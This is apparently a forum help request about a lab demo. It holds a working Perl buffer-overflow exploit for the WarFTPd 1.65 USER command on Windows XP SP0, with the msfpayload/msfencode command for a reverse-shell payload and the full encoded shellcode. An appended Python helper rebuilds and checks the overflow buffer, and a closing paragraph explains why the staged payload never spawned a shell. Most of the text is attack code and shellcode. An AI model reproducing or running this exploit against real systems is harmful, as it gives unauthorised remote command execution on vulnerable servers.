I was recently trying to put together an example of how you can use metasploit to generate exploit code and I ran up against an issue. Hopefully someone can tell me where I went wrong in this process.
The exploit I wanted to demo was warftpd 1.65, since there's a whole lot of stuff out there already on it. Looking at the metasploit module:
exploit/windows/ftp/warftpd_165_user I find that
'BadChars' => "\x00\x0a\x0d\x40",
'Ret' => 0x71ab1d54 # for XP SP0
Now, using the msf tools, I generate the exploit code:
~/metasploit$ ./msfpayload windows/shell/reverse_tcp exitfunc=process,lhost=192.168.50.129,lport=4444 r | ./msfencode -b '\x00\x0a\x0d\x40' -t perl
[*] x86/shikata_ga_nai succeeded, final size 205
"\xbd\x69\x9e\x09\x95\xdb\xca\xd9\x74\x24\xf4\x33\xc9\xb1" .
"\x2d\x58\x31\x68\x14\x83\xe8\xfc\x03\x68\x10\x8b\x6b\xf5" .
"\xff\xa0\xd3\xee\xf9\xc9\x23\x11\x99\x04\x07\x65\x27\x5a" .
"\x3c\x06\xe5\xda\x43\x18\x9e\x4d\x64\xe7\x4b\xfa\x50\x7d" .
"\x8a\x12\xa9\x41\x14\x46\x0b\x8b\x2a\x97\x4e\x88\xf5\xe2" .
"\xb8\xd2\x93\x35\x8f\xa0\xb8\x0e\x84\x04\x1b\x91\x73\xfc" .
"\xe8\x8d\xda\x8a\xa0\xb1\xdd\x65\x3d\xe5\x44\xfc\x2e\xd1" .
"\x6a\x9e\x51\xf9\xa2\xbb\xca\x72\x87\x0b\x98\xc4\x04\xe7" .
"\xee\xd8\xb9\x7c\x66\xe8\x9f\xe4\x24\x8e\x77\xda\xf8\x26" .
"\xff\x6f\xcf\xe9\xab\xe9\x96\x67\x34\x09\x3e\x12\xe7\xa6" .
"\xec\x4f\x4b\x1a\x50\x3c\xc2\x7b\x30\x43\x3b\x8b\xbf\x14" .
"\x97\xea\x06\x7d\xc8\x0c\xae\xe7\x4e\x5a\x20\x18\x66\x0c" .
"\xd7\x26\x2f\x01\xa9\xc0\x58\x77\xf5\x6a\xca\xfe\xe6\x18" .
"\xfc\x53\xbe\xba\x45\x04\x45\xbd\x60\xfb\xf1\x4d\xdd\xaf" .
"\xae\x1e\xbb\xf6\x91\x98\xbc\xef\x18";
and then I incorporate all of that into the Perl exploit:
#!/usr/bin/perl
# warftpd 1.65 USER overflow, target XP SP0 (bad chars and return address taken
# from the metasploit module exploit/windows/ftp/warftpd_165_user)
use strict;
use warnings;
use IO::Socket;

my $sock = IO::Socket::INET->new(
    PeerAddr => "192.168.50.128",
    PeerPort => "21",
    Proto    => "tcp",
) or die "connect failed: $!";

my $trash = <$sock>;    # eat the FTP banner

# 485 bytes of filler, the return address 0x71ab1d54 packed little-endian,
# a 115 byte sled of 0x41 (inc ecx, harmless), then the encoded payload
my $str = "USER " . "A" x 485 . "\x54\x1d\xab\x71" . "\x41" x 115;
$str .= "\x29\xc9\xb1\x2d\xda\xc5\xb8\x0b\xe6\x4f\x25\xd9\x74\x24" .
        "\xf4\x5e\x31\x46\x15\x03\x46\x15\x83\xc6\x04\xe9\x13\xb3" .
        "\x4f\x06\x9c\xa4\x69\x27\xdc\xca\xea\xe6\xf8\xbe\x96\x34" .
        "\x74\xbc\x55\x3c\x8b\xd2\x2d\xeb\xab\x2d\xd8\x98\x98\xb7" .
        "\x1d\x70\xd1\x07\x84\x20\xd3\x42\xba\x39\x16\xd6\x05\x4c" .
        "\x60\x94\xe3\x97\x46\x6e\x0f\xac\xdd\xde\xeb\x33\x0b\x86" .
        "\x78\x2f\x92\xcc\x30\x53\x25\x3a\xcd\x47\xbc\x35\xbe\xb3" .
        "\xa2\x24\xc0\x5b\xeb\x7d\x5a\x10\x4f\xb2\x28\x66\x5c\x39" .
        "\x5e\x7a\xf1\xb6\xf7\x8a\x57\xaf\x54\xec\x0f\x1c\x69\x98" .
        "\xb8\x11\xbf\x07\x13\xb0\x06\xc5\xfb\xc3\xaf\xbc\xaf\x68" .
        "\x03\xed\x0c\xdc\xe0\x42\x1a\x05\x80\xe5\xf3\xc2\x4f\xb2" .
        "\x58\xb5\xf6\xdb\x80\xc6\xdf\x45\x86\x91\x8f\x76\x2e\x76" .
        "\x27\x48\x67\x4b\x39\x2e\x10\xbd\x65\xc8\xb3\x34\x76\x7e" .
        "\x24\x14\x2e\x18\xfd\xcd\xd5\x1b\x2b\xa1\x61\xef\x84\x11" .
        "\xdd\xbc\x42\x2f\x21\x7a\x74\xa9\xa8";
print $sock $str . "\r\n";
$trash = <$sock>;    # server reply, if any, to the overflowed USER
print $sock "pass test \r\n";
close($sock);
The exploit is launched when I run it; my listener gets a connection back, however it doesn't appear that cmd.exe is ever spawned, and as soon as I send anything on the connection back the application crashes. When I do it from within metasploit it works great, so I feel comfortable that this is something that I'm doing wrong.
Thanks in advance for any insight.
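The following is an added example, not part of the post above and not Metasploit's own code. It takes the numbers quoted from the module and the msfencode -t perl output as posted, parses that Perl string literal back into raw bytes, and runs the checks a practitioner does before blaming the shellcode: that the payload and everything else in the USER argument contain none of the module's bad characters, that the return address sits at the expected offset and is byte-swapped correctly, and what the total buffer size comes to. The 485/115 lengths, the bad-character list and the return address come from the post; the function names and the report layout are this example's own.

```python
import re
import struct

# Constants quoted in the post from exploit/windows/ftp/warftpd_165_user.
BAD_CHARS = b"\x00\x0a\x0d\x40"
RET_XP_SP0 = 0x71AB1D54          # 'Ret' for XP SP0
PAD_LEN = 485                    # "A" x 485 before the return address in the post's buffer
SLED_LEN = 115                   # "\x41" x 115 between the return address and the payload

# The msfencode -t perl output copied from the post (x86/shikata_ga_nai, final size 205).
MSFENCODE_PERL = r'''
"\xbd\x69\x9e\x09\x95\xdb\xca\xd9\x74\x24\xf4\x33\xc9\xb1" .
"\x2d\x58\x31\x68\x14\x83\xe8\xfc\x03\x68\x10\x8b\x6b\xf5" .
"\xff\xa0\xd3\xee\xf9\xc9\x23\x11\x99\x04\x07\x65\x27\x5a" .
"\x3c\x06\xe5\xda\x43\x18\x9e\x4d\x64\xe7\x4b\xfa\x50\x7d" .
"\x8a\x12\xa9\x41\x14\x46\x0b\x8b\x2a\x97\x4e\x88\xf5\xe2" .
"\xb8\xd2\x93\x35\x8f\xa0\xb8\x0e\x84\x04\x1b\x91\x73\xfc" .
"\xe8\x8d\xda\x8a\xa0\xb1\xdd\x65\x3d\xe5\x44\xfc\x2e\xd1" .
"\x6a\x9e\x51\xf9\xa2\xbb\xca\x72\x87\x0b\x98\xc4\x04\xe7" .
"\xee\xd8\xb9\x7c\x66\xe8\x9f\xe4\x24\x8e\x77\xda\xf8\x26" .
"\xff\x6f\xcf\xe9\xab\xe9\x96\x67\x34\x09\x3e\x12\xe7\xa6" .
"\xec\x4f\x4b\x1a\x50\x3c\xc2\x7b\x30\x43\x3b\x8b\xbf\x14" .
"\x97\xea\x06\x7d\xc8\x0c\xae\xe7\x4e\x5a\x20\x18\x66\x0c" .
"\xd7\x26\x2f\x01\xa9\xc0\x58\x77\xf5\x6a\xca\xfe\xe6\x18" .
"\xfc\x53\xbe\xba\x45\x04\x45\xbd\x60\xfb\xf1\x4d\xdd\xaf" .
"\xae\x1e\xbb\xf6\x91\x98\xbc\xef\x18";
'''


def perl_hex_to_bytes(text):
    """Turn msfencode's Perl-string output ("\\x..\\x.." . "\\x..";) back into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r'\\x([0-9a-fA-F]{2})', text))


def find_bad_chars(data, bad=BAD_CHARS):
    """Return (offset, value) for every byte of data that is in the bad-character set."""
    return [(i, b) for i, b in enumerate(data) if b in bad]


def build_user_buffer(shellcode, ret=RET_XP_SP0):
    """Rebuild the post's USER buffer: "USER " + pad + ret (little-endian) + sled + payload + CRLF."""
    return (b"USER "
            + b"A" * PAD_LEN
            + struct.pack("<I", ret)          # 0x71ab1d54 -> "\x54\x1d\xab\x71"
            + b"\x41" * SLED_LEN              # 0x41 = inc ecx, executes harmlessly into the payload
            + shellcode
            + b"\r\n")


def check_buffer(buf):
    """Checks worth doing before sending: bad chars anywhere in the overflow (everything
    between "USER " and the CRLF terminator, which legitimately contains 0x0d 0x0a) and
    the position and byte order of the return address."""
    prefix = len(b"USER ")
    body = buf[prefix:-2]
    return {
        "total_len": len(buf),
        "ret_offset": prefix + PAD_LEN,
        "ret_bytes": buf[prefix + PAD_LEN:prefix + PAD_LEN + 4],
        "bad_chars": find_bad_chars(body),
    }


SHELLCODE = perl_hex_to_bytes(MSFENCODE_PERL)

if __name__ == "__main__":
    print("payload bytes:", len(SHELLCODE))
    print("bad chars in payload:", find_bad_chars(SHELLCODE))
    for key, value in check_buffer(build_user_buffer(SHELLCODE)).items():
        print(f"{key}: {value}")
```

What a check like this cannot catch is the payload type. windows/shell/reverse_tcp (with the slash) is a staged payload: the bytes msfencode emits are only the stager, which connects back and then waits for a Metasploit handler (exploit/multi/handler) to send the actual shell stage down the connection. A plain netcat listener sees the connect-back but never delivers the stage, so no cmd.exe appears, and whatever is typed into that connection is consumed by the stager as stage data. windows/shell_reverse_tcp (with the underscore) is the single-stage variant that carries cmd.exe inside the generated bytes and works with any listener.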